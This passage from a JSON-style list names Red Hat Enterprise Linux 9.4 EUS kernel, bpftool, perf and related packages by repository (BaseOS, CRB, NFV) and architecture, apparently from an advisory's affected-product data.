"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
